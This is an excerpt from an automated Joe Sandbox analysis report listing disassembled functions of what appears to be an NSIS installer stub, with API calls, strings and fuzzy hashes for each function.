                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                    • String ID: verifying installer: %d%%
                                                    • API String ID: 1451636040-82062127
                                                    • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                    • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                    • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                    • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                    APIs
                                                    • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                    • wsprintfW.USER32 ref: 00404457
                                                    • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: ItemTextlstrlenwsprintf
                                                    • String ID: %u.%u%s%s$@rD
                                                    • API String ID: 3540041739-1813061909
                                                    • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                    • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                    • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                    • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                    APIs
                                                    • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                    • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                    • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                    • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Char$Next$Prev
                                                    • String ID: *?|<>/":
                                                    • API String ID: 589700163-165019052
                                                    • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                    • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                    • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                    • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                    APIs
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                    • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                    • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Close$DeleteEnumOpen
                                                    • String ID:
                                                    • API String ID: 1912718029-0
                                                    • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                    • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                    • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                    • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                    APIs
                                                    • GetDlgItem.USER32(?), ref: 004020A3
                                                    • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                    • DeleteObject.GDI32(00000000), ref: 004020EE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                    • String ID:
                                                    • API String ID: 1849352358-0
                                                    • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                    • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                    • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                    • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                    APIs
                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Timeout
                                                    • String ID: !
                                                    • API String ID: 1777923405-2657877971
                                                    • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                    • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                    • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                    • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                    APIs
                                                      • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    Strings
                                                    • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                    • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                    • API String ID: 1697273262-1764544995
                                                    • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                    • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                    • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                    • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 00404902
                                                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                      • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Window$CallMessageProcSendVisible
                                                    • String ID: $@rD
                                                    • API String ID: 3748168415-881980237
                                                    • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                    • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                    • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                    • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                    APIs
                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                      • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                    • lstrlenW.KERNEL32 ref: 004026B4
                                                    • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                    • String ID: CopyFiles "%s"->"%s"
                                                    • API String ID: 2577523808-3778932970
                                                    • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                    • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                    • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                    • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: lstrcatwsprintf
                                                    • String ID: %02x%c$...
                                                    • API String ID: 3065427908-1057055748
                                                    • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                    • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                    • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                    • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 00405057
                                                      • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                    • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                    • String ID: Section: "%s"$Skipping section: "%s"
                                                    • API String ID: 2266616436-4211696005
                                                    • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                    • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                    • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                    • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                    APIs
                                                    • GetDC.USER32(?), ref: 00402100
                                                    • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                    • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                    • String ID:
                                                    • API String ID: 1599320355-0
                                                    • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                    • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                    • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                    • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                    APIs
                                                      • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                    • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                    • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                    • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: lstrcpyn$CreateFilelstrcmp
                                                    • String ID: Version
                                                    • API String ID: 512980652-315105994
                                                    • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                    • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                    • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                    • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                    APIs
                                                    • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                    • GetTickCount.KERNEL32 ref: 00403303
                                                    • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                    • String ID:
                                                    • API String ID: 2102729457-0
